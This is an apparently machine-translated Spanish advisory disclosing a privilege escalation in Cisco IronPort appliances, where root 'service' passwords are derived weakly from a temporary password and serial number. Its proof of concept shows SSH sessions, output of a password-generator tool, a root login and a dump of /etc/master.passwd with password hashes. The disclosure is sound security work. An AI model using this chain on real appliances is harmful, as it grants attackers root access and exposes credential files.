Actualizado para Linux
Cisco Ironport Electrodomésticos Proveedor de vulnerabilidad de escalada de privilegios: Página web de productos de Cisco: http://www.cisco.com Versiones (s) afectadas de Cisco Ironport - Asyncos 8.5.5-280 Cisco Ironport WSA - Asyncos 8.0.5-075 Cisco Ironport SMA SMA - Asyncos 8.3.6-0 Fecha: 22/05/2014 Créditos: Glafkos Charalambous CVE: No asignado por Cisco
Línea de tiempo de divulgación: 19-05-2014: Notificación del proveedor 20-05-2014: Respuesta del proveedor/retroalimentación 27-08-2014: Fix/Patch del proveedor 24-01-2015: Divulgación pública
Descripción: Los electrodomésticos de Cisco Ironport son vulnerables a la escalada de privilegios de "administrador" autenticado. Al habilitar la cuenta de servicio de la GUI o la CLI, permite que un administrador obtenga acceso raíz en el aparato, sin pasar por las limitaciones de la cuenta de "administrador" existentes. La vulnerabilidad se debe a la implementación del algoritmo débil en el proceso de generación de contraseñas que Cisco utiliza para acceder de forma remota al aparato para proporcionar soporte técnico.
Respuesta del proveedor: como se anticipó, esto no se considera una vulnerabilidad sino un problema de endurecimiento de seguridad. Como tal, no asignamos un CVE, sin embargo, me aseguré de que esto se fije en SMA, ESA y WSA. La solución incluyó varios cambios, como proteger mejor el algoritmo en el binario, cambiar el algoritmo en sí para ser más robusto y hacer cumplir la complejidad de la contraseña cuando el administrador establece el frase de aprobación y habilita la cuenta.
[SD] Nota: Se necesitan credenciales administrativas para activar el Acceso a la Representante de Soporte y configurar la frase de aprobación que se utiliza para calcular la contraseña final. [GC] Todavía el usuario administrativo tiene permisos limitados en el dispositivo y las credenciales también pueden comprometerse, incluso con una contraseña predeterminada que conduce a un acceso raíz completo.
[SD] Este problema se rastrea para la ESA por ID de error de Cisco: CSCUO96011 para la SMA por ID de error de Cisco: CSCUO96056 y para WSA por Cisco Bug ID CSCUO90528
Detalles técnicos: Al iniciar sesión en el dispositivo utilizando la contraseña predeterminada "Ironport" o el usuario especificado por uno, existe una opción para habilitar el acceso remoto de atención al cliente. Esta opción se puede encontrar en Ayuda y soporte -> Acceso remoto en la GUI o utilizando la cuenta de la consola CLI "habilitada" y emitiendo el servicio de comando. Habilitar este servicio requiere una contraseña de usuario temporal que debe proporcionarse junto con el número de serie del dispositivo a Cisco TechSupport para conectarse y autenticarse de forma remota al dispositivo.
Al tener una contraseña temporal y el número de serie del aparato al habilitar la cuenta de servicio, un atacante puede, a su vez, obtener acceso completo a la raíz y potencialmente dañarlo, trasero, etc.
POC:
root@kali:~# ssh -lenablediag 192.168.0.158
Password:
Last login: Sat Jan 24 15:47:07 2015 from 192.168.0.163
Copyright (c) 2001-2013, Cisco Systems, Inc.
AsyncOS 8.5.5 for Cisco C100V build 280
Welcome to the Cisco C100V Email Security Virtual Appliance
Available Commands:
help -- View this text.
quit -- Log out.
service -- Enable or disable access to the service system.
network -- Perform emergency configuration of the diagnostic network interface.
clearnet -- Resets configuration of the diagnostic network interface.
ssh -- Configure emergency SSH daemon on the diagnostic network interface.
clearssh -- Stop emergency SSH daemon on the diagnostic network interface.
tunnel -- Start up tech support tunnel to IronPort.
print -- Print status of the diagnostic network interface.
reboot -- Reboot the appliance.
S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
Service Access currently disabled.
ironport.example.com> service
Service Access is currently disabled. Enabling this system will allow an
IronPort Customer Support representative to remotely access your system
to assist you in solving your technical issues. Are you sure you want
to do this? [Y/N]> Y
Enter a temporary password for customer support to use. This password may
not be the same as your admin password. This password will not be able
to be used to directly access your system.
[]> cisco123
Service access has been ENABLED. Please provide your temporary password
to your IronPort Customer Support representative.
S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
Service Access currently ENABLED (0 current service logins)
ironport.example.com>
gcc -std=99 -o woofwoof woofwoof.c -lcrypto
./woofwoof
Usage: woofwoof.exe -p password -s serial
-p <password> | Cisco Service Temp Password
-s <serial> | Cisco Serial Number
-h | This Help Menu
Example: woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4
./woofwoof -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019
F508A4
Service Password: b213c9a4
root@kali:~# ssh -lservice 192.168.0.158
Password:
Last login: Wed Dec 17 21:15:24 2014 from 192.168.0.10
Copyright (c) 2001-2013, Cisco Systems, Inc.
AsyncOS 8.5.5 for Cisco C100V build 280
Welcome to the Cisco C100V Email Security Virtual Appliance
# uname -a
FreeBSD ironport.example.com 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Fri Mar 14 08:04:05 PDT 2014 [email protected]:/usr/build/iproot/freebsd/mods/src/sys/amd64/compile/MESSAGING_GATEWAY.amd64 amd64
# cat /etc/master.passwd
# $Header: //prod/phoebe-8-5-5-br/sam/freebsd/install/dist/etc/master.passwd#1 $
root:*:0:0::0:0:Mr &:/root:/sbin/nologin
service:$1$bYeV53ke$Q7hVZA5heeb4fC1DN9dsK/:0:0::0:0:Mr &:/root:/bin/sh
enablediag:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:999:999::0:0:Administrator support access control:/root:/data/bin/enablediag.sh
adminpassword:$1$aDeitl0/$BlmzKUSeRXoc4kcuGzuSP/:0:1000::0:0:Administrator Password Tool:/data/home/admin:/data/bin/adminpassword.sh
daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5::0:0:System &:/:/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source,,,:/:/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin
support:$1$FgFVb064$SmsZv/ez7Pf4wJLp5830s/:666:666::0:0:Mr &:/root:/sbin/nologin
admin:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:1000:1000::0:0:Administrator:/data/home/admin:/data/bin/cli.sh
clustercomm:*:900:1005::0:0:Cluster Communication User:/data/home/clustercomm:/data/bin/command_proxy.sh
smaduser:*:901:1007::0:0:Smad User:/data/home/smaduser:/data/bin/cli.sh
spamd:*:783:1006::0:0:CASE User:/usr/case:/sbin/nologin
pgsql:*:70:70::0:0:PostgreSQL pseudo-user:/usr/local/pgsql:/bin/sh
ldap:*:389:389::0:0:OpenLDAP Server:/nonexistent:/sbin/nologin